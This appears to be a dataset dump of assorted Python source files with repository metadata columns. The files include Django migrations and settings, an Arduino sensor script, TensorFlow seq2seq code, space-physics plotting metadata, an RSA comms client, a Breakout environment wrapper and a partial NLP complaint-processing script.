blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f69a5854f33bc30eb43daf851f9e43ceb207ec1a | b7948d60834c4c6fe58d8d665177511cb6db53e2 | /Outpass Webapp + Api's - Django/student/migrations/0008_auto_20190815_0023.py | 08405388f8bb2400e3756da54e002813b1d1e8b2 | [] | no_license | abhinavsharma629/Outpass-Generator | 4a2ebc2c7d0fc678b2afd10a36c6cbcbc6583d60 | f363d49c47543c70e2c114ab7d48ffaef83b5de4 | refs/heads/master | 2022-02-24T15:07:58.171462 | 2019-10-05T16:05:09 | 2019-10-05T16:05:09 | 205,933,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Generated by Django 2.2.4 on 2019-08-14 18:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 2.2.4): makes several Student fields optional.

    Each AlterField below adds blank=True/null=True so the column may be
    left empty both in forms and at the database level.
    """

    # Must run after the migration that added RegisteredColleges.logo.
    dependencies = [
        ('student', '0007_registeredcolleges_logo'),
    ]

    operations = [
        # bed_no: optional positive integer
        migrations.AlterField(
            model_name='student',
            name='bed_no',
            field=models.PositiveIntegerField(blank=True, null=True),
        ),
        # branch: optional short text
        migrations.AlterField(
            model_name='student',
            name='branch',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        # er_no (enrollment number): optional, capped at 7 characters
        migrations.AlterField(
            model_name='student',
            name='er_no',
            field=models.CharField(blank=True, max_length=7, null=True),
        ),
        # hostel: optional short text
        migrations.AlterField(
            model_name='student',
            name='hostel',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        # room_no: optional short text (CharField, so non-numeric rooms allowed)
        migrations.AlterField(
            model_name='student',
            name='room_no',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        # year: optional positive integer
        migrations.AlterField(
            model_name='student',
            name='year',
            field=models.PositiveIntegerField(blank=True, null=True),
        ),
    ]
| [
"abhinavsharma629@gmail.com"
] | abhinavsharma629@gmail.com |
eee62d36b36c4aeebd4a3658b80342f4fe682763 | 384961849138a6f43679ec0c676ee2d71cefb307 | /MyTestAPI/MyTestAPI/wsgi.py | 367d0c41acaaf43b55f83e0ae626c5be007cccc2 | [] | no_license | emils-b/djangoAPI_learning | d64e8c1e2f2c5940bcdb890c4083a4b6e9110ce9 | 9383d73fc649486ebae24d056c2c8cc6464b509f | refs/heads/master | 2022-11-15T22:12:59.906716 | 2020-07-06T17:32:31 | 2020-07-06T17:32:31 | 272,533,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for MyTestAPI project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MyTestAPI.settings')

# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"emils.baskers@gmail.com"
] | emils.baskers@gmail.com |
0e354876c5279164c2576a15409170e757c6785a | c3eb84c722f6ec5d21cae2a8dd840dabd2b5b892 | /Programming in Python-311.py | 646209e09301c7b6b458f3d5a962403b784e73b2 | [] | no_license | AlpeshGo/DataQuest-Data-Analyst-in-Python | ca2266dd062556af5a9bcd9333dff96e99cae1c5 | f96250cb99da4c868f4989cf78ccf001bed1bf07 | refs/heads/main | 2023-06-28T04:51:53.896356 | 2021-07-28T17:12:20 | 2021-07-28T17:12:20 | 386,670,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | ## 2. Programming in Python ##
# DataQuest "Programming in Python" mission: step-by-step print() exercises.

## 2. Programming in Python ##
23+7  # evaluated but discarded - produces no output when run as a script

## 3. The print() Command ##
print(40+4)
print(200-25)
print(14+3)

## 4. Python Syntax ##
print(30+10+40)
print(4)
print(-3)

## 5. Computer Programs ##
print(34+16)
print(34)
print(-34)

## 6. Code Comments ##
# INITIAL CODE
print(34 + 16)
print(34)
print(-34)

## 7. Arithmetical Operations ##
print(16*10)
print(48/5)
print(5**3)
"noreply@github.com"
] | noreply@github.com |
34705821e8da255de9377392fc63624202cd296b | 0d8d97082f7c562f3f24a7a5966066f10299e356 | /beerControl.py | 67656a1fd0f403cdb70f21f705b1feacca991d0a | [] | no_license | dmoranj/fi-beer | 7b4bf066f4c64ecf6bf371c2ad98e6bd6688d9cb | 41ff6c6a51c243219305624af33517bd62951bc1 | refs/heads/master | 2016-09-06T01:57:23.426214 | 2014-01-28T12:37:18 | 2014-01-28T12:37:18 | 16,064,837 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | #!/usr/bin/env python
# LED with 560 Ohm resistor on Pin 10 to GND
# Tony Goodhew - 10 May 2013
from nanpy import Arduino
from nanpy import serial_manager
serial_manager.connect('/dev/ttyACM0') # serial connection to Arduino
from time import sleep
import NGSIClient
pins = [0, 1]
for pin in pins:
Arduino.pinMode(pin, Arduino.INPUT)
while 4 < 5:
temperaturesList = []
for pin in pins:
print "Reading"
value = Arduino.analogRead(pin)
degreesC = (value * 0.004882814)*100
print "The voltage in pin " + str(pin) + " is " + str(degreesC)
temperaturesList.append(degreesC)
NGSIClient.createContext("Cuba", "CubaDani", NGSIClient.createMeasureArray("centrigrade", "temperature", temperaturesList))
sleep(5)
print "Finished reading"
| [
"daniel@Aosta.(none)"
] | daniel@Aosta.(none) |
5a5e091b0cb0991756eaa7e0c7fdb809951c7cd4 | d158e396e083ad6761a1871bd39519d588c461bc | /hw/9dcv/contrib_seq2seq.py | e2a412f09abce6ff8f5b388720e649b2947d8530 | [] | no_license | jendelel/npfl114 | c7250e6256f556c2e9f134dce2f2148117c43368 | 44a562e2aae96a9e30f930cfae7985043f172828 | refs/heads/master | 2021-01-10T18:07:46.310969 | 2017-01-16T15:10:04 | 2017-01-16T15:10:04 | 71,621,825 | 1 | 2 | null | 2017-01-05T09:59:18 | 2016-10-22T06:42:31 | Python | UTF-8 | Python | false | false | 9,159 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Seq2seq layer operations for use in neural networks.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# decoder_fn(time, cell_state, cell_input, cell_output, context_state)
# -> (done, next_state, next_input, emit_output, next_context_state
def dynamic_rnn_decoder(cell, decoder_fn, inputs=None, sequence_length=None,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None, name=None):
""" Dynamic RNN decoder for a sequence-to-sequence model specified by
RNNCell and decoder function.
The `dynamic_rnn_decoder` is similar to the `tf.python.ops.rnn.dynamic_rnn`
as the decoder does not make any assumptions of sequence length and batch
size of the input.
The `dynamic_rnn_decoder` has two modes: training or inference and expects
the user to create seperate functions for each.
Under both training and inference `cell` and `decoder_fn` is expected. Where
the `cell` performs computation at every timestep using the `raw_rnn` and
the `decoder_fn` allows modelling of early stopping, output, state, and next
input and context.
When training the user is expected to supply `inputs`. At every time step a
slice of the supplied input is fed to the `decoder_fn`, which modifies and
returns the input for the next time step.
`sequence_length` is needed at training time, i.e., when `inputs` is not
None, for dynamic unrolling. At test time, when `inputs` is None,
`sequence_length` is not needed.
Under inference `inputs` is expected to be `None` and the input is inferred
solely from the `decoder_fn`.
Args:
cell: An instance of RNNCell.
decoder_fn: A function that takes time, cell state, cell input,
cell output and context state. It returns a early stopping vector,
cell state, next input, cell output and context state.
Examples of decoder_fn can be found in the decoder_fn.py folder.
inputs: The inputs for decoding (embedded format).
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: (optional) An int32/int64 vector sized `[batch_size]`.
if `inputs` is not None and `sequence_length` is None it is inferred
from the `inputs` as the maximal possible sequence length.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the `raw_rnn`;
defaults to None.
name: NameScope for the decoder;
defaults to "dynamic_rnn_decoder"
Returns:
A pair (outputs, state) where:
outputs: the RNN output 'Tensor'.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state and will be shaped
`[batch_size, cell.state_size]`.
Raises:
ValueError: if inputs is not None and has less than three dimensions.
"""
with ops.name_scope(name, "dynamic_rnn_decoder",
[cell, decoder_fn, inputs, sequence_length,
parallel_iterations, swap_memory, time_major, scope]):
if inputs is not None:
# Convert to tensor
inputs = ops.convert_to_tensor(inputs)
# Test input dimensions
if inputs.get_shape().ndims is not None and (
inputs.get_shape().ndims < 2):
raise ValueError("Inputs must have at least two dimensions")
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
inputs = array_ops.transpose(inputs, perm=[1, 0, 2])
dtype = inputs.dtype
# Get data input information
input_depth = int(inputs.get_shape()[2])
batch_depth = inputs.get_shape()[1].value
max_time = inputs.get_shape()[0].value
if max_time is None:
max_time = array_ops.shape(inputs)[0]
# Setup decoder inputs as TensorArray
inputs_ta = tensor_array_ops.TensorArray(dtype, size=max_time)
inputs_ta = inputs_ta.unpack(inputs)
def loop_fn(time, cell_output, cell_state, loop_state):
if cell_state is None: # first call, before while loop (in raw_rnn)
if cell_output is not None:
raise ValueError("Expected cell_output to be None when cell_state "
"is None, but saw: %s" % cell_output)
if loop_state is not None:
raise ValueError("Expected loop_state to be None when cell_state "
"is None, but saw: %s" % loop_state)
context_state = None
else: # subsequent calls, inside while loop, after cell excution
if isinstance(loop_state, tuple):
(done, context_state) = loop_state
else:
done = loop_state
context_state = None
# call decoder function
if inputs is not None: # training
# get next_cell_input
if cell_state is None:
next_cell_input = inputs_ta.read(0)
else:
if batch_depth is not None:
batch_size = batch_depth
else:
batch_size = array_ops.shape(done)[0]
next_cell_input = control_flow_ops.cond(
math_ops.equal(time, max_time),
lambda: array_ops.zeros([batch_size, input_depth], dtype=dtype),
lambda: inputs_ta.read(time))
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, next_cell_input,
cell_output, context_state)
else: # inference
# next_cell_input is obtained through decoder_fn
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, None, cell_output,
context_state)
# check if we are done
if next_done is None: # training
next_done = time >= sequence_length
# build next_loop_state
if next_context_state is None:
next_loop_state = next_done
else:
next_loop_state = (next_done, next_context_state)
return (next_done, next_cell_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta, state, _ = rnn.raw_rnn(
cell, loop_fn, parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=scope)
outputs = outputs_ta.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs = array_ops.transpose(outputs, perm=[1, 0, 2])
return outputs, state
| [
"lukas.jendele@gmail.com"
] | lukas.jendele@gmail.com |
b899b807968e506eff8c87b6680f93bbba599982 | 407ba0e97fd7e358b9ac546895778d25ca653198 | /mytestsite/mytestsite/settings.py | a53fbc85a55534178d673c72425056277f9dd38e | [] | no_license | LakshayBadlani/DjangoLibrarySite | 04b9cb1f00c1b711215ab8e81c4d6f129b95f11f | adc366c98bc088646d6121de3d6b54c980da2507 | refs/heads/master | 2020-03-19T04:37:38.335466 | 2018-06-02T20:01:13 | 2018-06-02T20:01:13 | 135,847,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,100 | py | """
Django settings for mytestsite project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=v5&e#wmc-_lb#@5ub25ih5fbbv(3+$2s=yb2ze)!^-d54juv$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mytestsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mytestsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"l.badlani@berkeley.edu"
] | l.badlani@berkeley.edu |
37842015585005a9c5c98209b970920d38a474d0 | 991c0299c9eae4034db672a2c405bafc8f44e1c8 | /pyspedas/pyspedas/mms/edi/mms_edi_set_metadata.py | c5ea1670c006a30d978aab0ce337ad344dffe31c | [
"MIT"
] | permissive | nsioulas/MHDTurbPy | 650b915cb23f4dd2458d09450e7dc1382c643da2 | 7ac6615caa737fb89b0314d1d55fcd60537c423c | refs/heads/main | 2023-06-01T06:31:58.944174 | 2023-05-13T05:36:06 | 2023-05-13T05:36:06 | 590,799,212 | 8 | 1 | null | 2023-02-01T20:38:49 | 2023-01-19T08:33:08 | Jupyter Notebook | UTF-8 | Python | false | false | 3,513 | py | from pytplot import options
from pyspedas import tnames
def mms_edi_set_metadata(probe, data_rate, level, suffix=''):
"""
This function updates the metadata for EDI data products
Parameters
----------
probe : str or list of str
probe or list of probes, valid values for MMS probes are ['1','2','3','4'].
data_rate : str or list of str
instrument data rate for EDI
level : str
indicates level of data processing. the default if no level is specified is 'l2'
suffix: str
The tplot variable names will be given this suffix. By default,
no suffix is added.
"""
if not isinstance(probe, list): probe = [probe]
if not isinstance(data_rate, list): data_rate = [data_rate]
if not isinstance(level, list): level = [level]
instrument = 'edi'
tvars = set(tnames())
for this_probe in probe:
for this_dr in data_rate:
for this_lvl in level:
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx DSL', 'Vy DSL', 'Vz DSL'])
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx GSE', 'Vy GSE', 'Vz GSE'])
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx GSM', 'Vy GSM', 'Vz GSM'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex DSL', 'Ey DSL', 'Ez DSL'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex GSE', 'Ey GSE', 'Ez GSE'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex GSM', 'Ey GSM', 'Ez GSM']) | [
"nsioulas@g.ucla.edu"
] | nsioulas@g.ucla.edu |
c6003fe58dc0e8d77951f5bc6a3d9a76d0811c41 | 84fbc1625824ba75a02d1777116fe300456842e5 | /Engagement_Challenges/Engagement_4/powerbroker_2/proofs/powerbroker/overlogging/comms_client.py | b86bb9c2bfa9e9b6aa4a339c5a3b0e8fa2e6d0f6 | [] | no_license | unshorn-forks/STAC | bd41dee06c3ab124177476dcb14a7652c3ddd7b3 | 6919d7cc84dbe050cef29ccced15676f24bb96de | refs/heads/master | 2023-03-18T06:37:11.922606 | 2018-04-18T17:01:03 | 2018-04-18T17:01:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse
import rsa_gen
import comms_connection
E = 65537L
class CommsClient(object):
def __init__(self, name, rsa_prime1_file=None, rsa_prime2_file=None):
self.name = name
if rsa_prime1_file is None:
self.rsa = create_new_rsa()
else:
self.rsa = generate_rsa(rsa_prime1_file, rsa_prime2_file)
def connect(self, host, port, handler, our_host=None, our_port=None):
if our_host is None or our_port is None:
self.connection = comms_connection.Connection(host, port, handler, self.name, self.rsa)
else:
self.connection = comms_connection.Connection(host, port, handler, self.name, self.rsa, our_host, our_port)
return self.connection
def create_new_rsa():
    """Generate two fresh primes and build an RSA key object from them."""
    return generate_rsa_from_primes(*rsa_gen.generate_primes())
def generate_rsa(prime1_file, prime2_file):
    """Build an RSA key object from primes stored on disk.

    :param prime1_file: file containing the first RSA prime
    :param prime2_file: file containing the second RSA prime
    :return: the constructed RSA instance
    """
    p, q = read_primes(prime1_file, prime2_file)
    return generate_rsa_from_primes(p, q)
def generate_rsa_from_primes(prime1, prime2):
    """Construct an RSA key object from two primes using public exponent E."""
    modulus = prime1 * prime2
    phi = (prime1 - 1) * (prime2 - 1)
    # Private exponent: modular inverse of E mod phi(n).
    private_exp = inverse(E, phi)
    key_components = (modulus, E, private_exp, prime1, prime2)
    impl = RSA.RSAImplementation(use_fast_math=False)
    return impl.construct(key_components)
def read_primes(p_file, q_file=None):
    """Load RSA primes p and q from disk and return them as a (p, q) int tuple.

    If q_file is omitted, p_file is expected to hold both primes, one per line.
    """
    if q_file is None:
        # Single-file layout: p on the first line, q on the second.
        with open(p_file) as src:
            first = src.readline()
            second = src.readline()
        return (int(first), int(second))
    # Two-file layout: one prime per file.
    with open(p_file) as src:
        p = int(src.read())
    with open(q_file) as src:
        q = int(src.read())
    return (p, q)
| [
"rborbely@cyberpointllc.com"
] | rborbely@cyberpointllc.com |
b32873f6bdc08e24cf8e955a80460c699fad54e4 | e8f44980b2db5c77a23e3b50eece1154ea1fb33d | /paddle.py | f98e4db3effb3f682343bd42f64bed701d3b8d93 | [] | no_license | CalCharles/SelfBreakout | adb9a96a2356a618e9f530f080a666644c5634c6 | 742006ef1dc9239f467aac1b9599afe26683f87b | refs/heads/master | 2020-07-23T18:58:08.070637 | 2019-09-10T22:45:07 | 2019-09-10T22:45:07 | 207,675,605 | 0 | 1 | null | 2019-09-10T22:53:55 | 2019-09-10T22:39:36 | Python | UTF-8 | Python | false | false | 2,165 | py | import os
from SelfBreakout.breakout_screen import Screen
from Environments.environment_specification import RawEnvironment
from file_management import get_edge
class Paddle(RawEnvironment):
    '''
    A fake environment that pretends that the paddle portion has been solved:
    it exposes three actions (no-op / left / right) and remaps them onto the
    wrapped Screen environment's four-action space.
    '''
    def __init__(self, frameskip = 1):
        self.num_actions = 3  # no-op, move left, move right
        self.itr = 0
        self.save_path = ""
        self.screen = Screen(frameskip=frameskip)
        self.reward= 0
        self.episode_rewards = self.screen.episode_rewards

    def set_save(self, itr, save_dir, recycle, all_dir=""):
        '''Configure save bookkeeping on this wrapper and the wrapped screen.'''
        self.save_path=save_dir
        self.itr = itr
        self.recycle = recycle
        self.screen.save_path=save_dir
        self.screen.itr = itr
        self.screen.recycle = recycle
        self.all_dir = all_dir
        try:
            os.makedirs(save_dir)
        except OSError:
            # Directory already exists (or cannot be created); keep the
            # original best-effort behavior and carry on.
            pass

    @staticmethod
    def _collapse_factor_action(factor_state):
        '''Map the screen's raw action id back to the 3-action space:
        {0,1} -> 0, 2 -> 1, 3 -> 2 (other values left untouched).
        Mutates factor_state["Action"] in place and returns factor_state.
        FIX: this logic was duplicated verbatim in step() and getState().'''
        raw = factor_state["Action"][1][0]
        if raw < 2:
            factor_state["Action"] = (factor_state["Action"][0], 0)
        elif raw == 2:
            factor_state["Action"] = (factor_state["Action"][0], 1)
        elif raw == 3:
            factor_state["Action"] = (factor_state["Action"][0], 2)
        return factor_state

    def step(self, action):
        '''Apply one of the 3 wrapper actions; returns (raw_state, factor_state, done).'''
        # TODO: action is assumed to be a tensor, might not be a safe assumption
        action = action.clone()
        # Remap wrapper actions {1, 2} onto screen actions {2, 3} (left/right).
        if action == 1:
            action[0] = 2
        elif action == 2:
            action[0] = 3
        raw_state, factor_state, done = self.screen.step(action, render=True)
        self.reward = self.screen.reward
        factor_state = self._collapse_factor_action(factor_state)
        return raw_state, factor_state, done

    def getState(self):
        '''Return (raw_state, factor_state) with the action collapsed to 3 values.'''
        raw_state, factor_state = self.screen.getState()
        return raw_state, self._collapse_factor_action(factor_state)
| [
"calebchuck@berkeley.edu"
] | calebchuck@berkeley.edu |
e8cd16d642eafb7841ee2000f309a5ac455c14ed | 6724031f51d41992deb8fc704b35b6faf3d94715 | /prj/machine_learning.py | 5a7c4e0aaafdbf287cbc2234f9fdbb00c0a3a17d | [
"MIT"
] | permissive | alenahoopoe/MakeComplaint | e8c2bdbec71cd0a86f2efcccd90a79de4063e7e7 | d09dcd9a67414ffae199765b4e6d4b4397769916 | refs/heads/master | 2022-01-05T02:17:54.851117 | 2019-06-25T17:55:40 | 2019-06-25T17:55:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,765 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 1 17:42:58 2019
@author: gayathri
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

# Load the complaints CSV twice: `dataset` stays raw for the feature/label
# split, while `data` is cleaned in place below.
# NOTE(review): hard-coded absolute path - only runs on the author's machine.
dataset = pd.read_csv('/home/gayathri/project/MakeComplaint/data.csv')
data = pd.read_csv('/home/gayathri/project/MakeComplaint/data.csv')
# Features: all columns between the first and the last; labels: column 3.
x = dataset.iloc[:,1:-1]
y = dataset.iloc[:,3].values
# Text cleanup on the working copy: drop commas, punctuation and digits,
# then trim trailing newlines (patterns are treated as regexes by pandas).
data['Complaint'] = data['Complaint'].str.replace(',',' ')
data['Subject'] = data['Subject'] =data['Subject'].str.replace('[^\w\s]','')
data['Complaint'] = data['Complaint'] =data['Complaint'].str.replace('[^\w\s]','')
#data['Complaint'] = data['Complaint'].str.replace(',',' ').str.lower()
data['Subject'] = data['Subject'] .str.replace('\d+', ' ')
data['Complaint'] = data['Complaint'] .str.replace('\d+', ' ')
data['Subject'] = data['Subject'].str.rstrip('\n')
data['Complaint'] = data['Complaint'].str.rstrip('\n')
# Combined text field used for tokenization / vectorization further down.
data['Subject_and_Complaint'] = data['Subject'] + " " + data['Complaint']
#x = datase.iloc[:,4].values
#splitting the data
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size =0.2,random_state = 0)
#Categorical data processing
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
# Integer-encode the class labels.
# NOTE(review): `y` is re-encoded AFTER the split above, so y_train/y_test
# still hold the original labels - looks unintended; verify the ordering.
label_encoder_y = LabelEncoder()
y = label_encoder_y.fit_transform(y)
# Narrow to the two text columns and rebuild the combined field on `df`.
dataframe = data[['Subject','Complaint']]
df=dataframe
df['Subject_and_Complaint'] = dataframe['Subject']+" "+ dataframe['Complaint']
df=df[['Subject_and_Complaint']]
print(df)
from nltk.corpus import stopwords
import nltk
from nltk.tokenize import word_tokenize

# Accumulators: English stop-word set plus per-row token lists.
data_token = []
stop_words = set(stopwords.words('english'))
data_list = []
#Removing named entities in the list
import spacy
nlp = spacy.load('en_core_web_md')
lis =[]
main_list =[]
# Collect the named entities spaCy finds in each row's combined text;
# main_list ends up holding one list of entity strings per row.
for i, row in df.iterrows():
    lis =[]
    df_row = nlp(row['Subject_and_Complaint'])
    for ent in df_row.ents:
        #print(ent.text, ent.label_)
        lis .append(ent.text)
    main_list.append(lis)
print("Named entity")
print(main_list)
#Tokens
# Tokenize each row and drop stop words; data_list holds one token list per row.
for i, row in df.iterrows():
    data_token = word_tokenize(row['Subject_and_Complaint'])
    result = [i for i in data_token if not i in stop_words]
    data_list.append(result)
print("Tokens without stopwords")
print(data_list)
#Removing named entity
# Dead code below: an unfinished attempt at filtering the collected named
# entities out of the token lists (kept as a string literal, never executed).
'''
for m,d in main_list,data_list:
    for j, k in m,d:
        if j not
'''
#vector representation of complaint
import spacy
nlp = spacy.load('en_core_web_md')
new_lis = []
lis = []
# For every token, take the norm of its spaCy word vector (rounded to two
# decimals); `lis` becomes one list of floats per row.
for i in data_list:
    new_lis = []
    for j in i:
        j = nlp(j)
        vec = j.vector_norm
        vec=float("{0:.2f}".format(vec))
        new_lis.append(vec)
